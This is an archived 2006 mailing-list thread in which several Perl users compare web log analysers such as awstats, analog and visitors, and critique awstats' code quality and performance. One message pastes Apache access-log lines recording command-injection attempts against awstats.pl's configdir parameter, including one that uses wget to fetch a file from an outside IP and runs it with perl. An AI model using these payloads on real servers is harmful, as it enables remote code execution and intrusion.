|
List Info
Thread: awstats
|
|
| awstats |

|
2006-03-08 08:45:26 |
A 10Kline CGI script, with most variables global and
including its own CGI
parameter parsing. Is this really the best option, or can
anyone suggest an
alternative which can parse Apache logfiles and successfully
separate out
robots and spiders (about 80-90% of our hits) from real
users? (The
department whose server this is rejected webalizer because
they didn't like
the answers it gave).
Jonathan
|
|
| awstats |

|
2006-03-08 08:51:24 |
We use analog here (http://www.analog.cx/),
seems to be up to the job.
With something called report magic you can get some very
nice stats out
of the box.
Personally I prefer something called webstats.pl but I
can't seem to
find a link to it anymore.
|
|
| awstats |

|
2006-03-08 09:03:52 |
On Wed, Mar 08, 2006 at 08:51:24AM +0000, Peter Hickman
wrote:
> We use analog here (http://www.analog.cx/),
seems to be up to the job.
> With something called report magic you can get some
very nice stats out
> of the box.
Isn't mint what all The Kewl Kids use these days?
http://www.haveamint.com/
a>
I haven't, but then I amn't cool. awstats works for me,
has done for
years. I never liked analog.
m.
--
_________________________________________
/ Sharon: I was like, totally shocked \
| when I read swm's postings on the list. |
| I thought he was a quiet boy. Everyone |
\ else: *racuous laughter* /
-----------------------------------------
\
\
__
UooU\.'     `.
\__/(         )
(       )
`YY~~~~YY'
|| ||
--
Gotta have a blog. It is the law.
http://www.stray
-toaster.co.uk/blog/
|
|
| awstats |

|
2006-03-08 09:25:37 |
On 08/03/06, Jonathan McKeown <jonathan hst.org.za> wrote:
> A 10Kline CGI script, with most variables global and
including its own CGI
> parameter parsing. Is this really the best option, or
can anyone suggest an
> alternative which can parse Apache logfiles and
successfully separate out
> robots and spiders (about 80-90% of our hits) from real
users? (The
> department whose server this is rejected webalizer
because they didn't like
> the answers it gave).
I run it as a cronjob generating a load of static html every
night..
works fine, and no dodgy CGI to worry about.
A.
|
|
| awstats |

|
2006-03-08 09:27:10 |
On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and
including its own CGI
> parameter parsing.
I'd say it has a widely known an exploitable flaw:
access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000]
"GET
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73c
ae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293
f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:64.49.219.174 - - [08/Mar/2005:15:51:22 +0000]
"GET
/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73c
ae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293
f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 322
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cgi-bin/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 314
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cgi/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 310
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cp/awstats/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 317
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000]
"GET //stat-cgi/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 315
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000]
"GET //awstats/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 314
It's still going on.
/J\
--
This e-mail is sponsored by http://www.integrat
ion-house.com/
|
|
| awstats |

|
2006-03-08 09:47:11 |
I knew I had seen that somewhere before, my snort logs!
There were only 20 incidents yesterday.
|
|
| awstats |

|
2006-03-08 10:38:47 |
Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and
including its own CGI
> parameter parsing. Is this really the best option, or
can anyone suggest an
> alternative which can parse Apache logfiles and
successfully separate out
> robots and spiders (about 80-90% of our hits) from real
users? (The
> department whose server this is rejected webalizer
because they didn't like
> the answers it gave).
I'm kinda fond of
http://www.hping.org/v
isitors/
which admittedly isn't quite as featureful as most, but is
simple, fast, and
seems to generate all the stats clients really *need* - plus
a pretty
route-through-site diagram that fulfils the shininess quota
nicely.
--
Matt S Trout Offering custom development,
consultancy and support
Technical Director contracts for Catalyst, DBIx::Class
and BAST. Contact
Shadowcat Systems Ltd. mst (at) shadowcatsystems.co.uk for
more information
+ Help us build a better perl ORM: http://dbix
-class.shadowcatsystems.co.uk/ +
|
|
| awstats |

|
2006-03-08 10:49:39 |
Jonathan McKeown writes:
> A 10Kline CGI script, with most variables global and
including its own
> CGI parameter parsing.
We looked at Awstats, to the extent of actually running it
for a while.
Then we stopped; we'd found plenty of reasons to avoid it:
- The known vulnerabilities in its CGI mode may have been
fixed, but
spaghetti code like that is just too hard and/or
unpleasant to
audit. I can't even say with confidence that letting
Awstats parse
your log files off-line is definitely safe.
- It can't actually parse Apache logs. Since 1.3.25,
Apache has used
a backslash escaping scheme for things like user-agents
and
referrers, so that you can actually parse log lines
where the client
sent a double-quote in one of those. Awstats doesn't
care about
that, so it misparses those lines.
- You can't just point it at a batch of log files;
instead, you have
to configure it to know where you store your log files,
and the
pattern used for the filenames. That means you can't
prime it with
the last month's (or year's) worth of logs -- you just
have to run
it for a month before it can give you any real history.
- It really really wants each vhost analysed to have
exactly one log
file. In each time period, we have one log file per
public-facing
server, each containing results for several vhosts. It
wants us to
split log files up by vhost, but then merge then by
public-facing
server, before we even have it look at them.
- It doesn't seem particularly fast. Admittedly, we
generate about 4
GiB of uncompressed logs in a day, but our home-grown
stuff (which
does actually parse, you know, Apache log files) seems
rather faster
at the basic work of parsing logs, throwing away robotic
traffic,
and aggregating data from the rest.
It's possible it's not as bad for other people. In
particular, to
handle the vhost/server issue, we were effectively
making Awstats
run through our logs once per vhost. But I became
convinced that
the time complexity of Awstats is supra-linear in the
number of
requests anyway. As it gathered more data over the
course of a
month, it became apparent that it was soon going to need
more CPU
time than we had available. That's when we turned it
off.
In general, Awstats seems to be a tool that's intended for
relatively
small sites, hosted by low-end providers, with limited or no
shell
access, and exactly one log file per customer. If you
don't fall into
that category, I don't think Awstats is going to be
particularly
convenient.
> Is this really the best option, or can anyone suggest
an alternative
> which can parse Apache logfiles and successfully
separate out robots
> and spiders (about 80-90% of our hits) from real users?
We wrote our own, sad to say. We use the ABCE robot list;
I've looked
at CPANning our code, but most of it's the data file, and I
think ABCE
own the copyright on the list.
Note also that having home-grown log analysis stuff does
mean that we
can do things that a general-purpose tool couldn't. For
example, our
software can examine popularity of site sections, rather
than just of
URLs.
--
Aaron Crane
|
|
| awstats |

|
2006-03-08 11:57:37 |
On Wed, 8 Mar 2006, Aaron Crane wrote:
> We looked at Awstats, to the extent of actually running
it for a while.
> Then we stopped; we'd found plenty of reasons to avoid
it:
>
> - The known vulnerabilities in its CGI mode may have
been fixed, but
> spaghetti code like that is just too hard and/or
unpleasant to
> audit. I can't even say with confidence that
letting Awstats parse
> your log files off-line is definitely safe.
Agreed. Every time I look at the code I want to scream.
It's just crying
out to be refactored into decent modules.
> - It can't actually parse Apache logs. Since
1.3.25, Apache has used
> a backslash escaping scheme for things like
user-agents and
> referrers, so that you can actually parse log lines
where the client
> sent a double-quote in one of those. Awstats
doesn't care about
> that, so it misparses those lines.
I've not foud this to be a problem with 6.4 but perhaps
I'm not looking in
the right place. Which version did you try ?
> - You can't just point it at a batch of log files;
instead, you have
> to configure it to know where you store your log
files, and the
> pattern used for the filenames. That means you
can't prime it with
> the last month's (or year's) worth of logs -- you
just have to run
> it for a month before it can give you any real
history.
A simple shell script allows you iterate over as many logs
as you want. We
rotate logs weekly and have had to rerun a whole year's
worth before now.
Wildcards would be nice though.
> - It really really wants each vhost analysed to have
exactly one log
> file. In each time period, we have one log file
per public-facing
> server, each containing results for several vhosts.
It wants us to
> split log files up by vhost, but then merge then by
public-facing
> server, before we even have it look at them.
Kinda. You do need to merge the logs into timestamp order
but you can lok
for specific vhosts with the %v modifier in the log format.
> - It doesn't seem particularly fast. Admittedly, we
generate about 4
> GiB of uncompressed logs in a day, but our
home-grown stuff (which
> does actually parse, you know, Apache log files)
seems rather faster
> at the basic work of parsing logs, throwing away
robotic traffic,
> and aggregating data from the rest.
It's not very fast and admits as much but it's fast enough
on our logs
that are about 450Mb/week.
> It's possible it's not as bad for other people.
In particular, to
> handle the vhost/server issue, we were effectively
making Awstats
> run through our logs once per vhost. But I became
convinced that
> the time complexity of Awstats is supra-linear in
the number of
> requests anyway. As it gathered more data over the
course of a
> month, it became apparent that it was soon going to
need more CPU
> time than we had available. That's when we turned
it off.
>
> In general, Awstats seems to be a tool that's intended
for relatively
> small sites, hosted by low-end providers, with limited
or no shell
> access, and exactly one log file per customer. If you
don't fall into
> that category, I don't think Awstats is going to be
particularly
> convenient.
I would agree with that. It's definitely not up to the job
of managing
large sites.
> > Is this really the best option, or can anyone
suggest an alternative
> > which can parse Apache logfiles and successfully
separate out robots
> > and spiders (about 80-90% of our hits) from real
users?
>
> We wrote our own, sad to say. We use the ABCE robot
list; I've looked
> at CPANning our code, but most of it's the data file,
and I think ABCE
> own the copyright on the list.
We're tending towards doing this too. I just looked at
webtrends and it's
almost $10,000 for the licence we need.
> Note also that having home-grown log analysis stuff
does mean that we
> can do things that a general-purpose tool couldn't.
For example, our
> software can examine popularity of site sections,
rather than just of
> URLs.
This is the problem we're now experiencing with awstats. We
need
granularity that awstats doesn't have.
Simon.
--
"You've really gotta know where your towel is."
|
|
| awstats |

|
2006-03-08 14:36:57 |
Matt S Trout wrote:
> Jonathan McKeown wrote:
>> A 10Kline CGI script, with most variables global
and including its own
>> CGI parameter parsing. Is this really the best
option, or can anyone
>> suggest an alternative which can parse Apache
logfiles and
>> successfully separate out robots and spiders (about
80-90% of our
>> hits) from real users? (The department whose server
this is rejected
>> webalizer because they didn't like the answers it
gave).
>
> I'm kinda fond of
>
> http://www.hping.org/v
isitors/
>
> which admittedly isn't quite as featureful as most,
but is simple, fast,
> and seems to generate all the stats clients really
*need* - plus a
> pretty route-through-site diagram that fulfils the
shininess quota nicely.
mmm.... smooth.
Thanks for that. I now have a reason to ditch webalizer.
David
--
"It's overkill of course, but you can never have too
much overkill."
|
|
|
|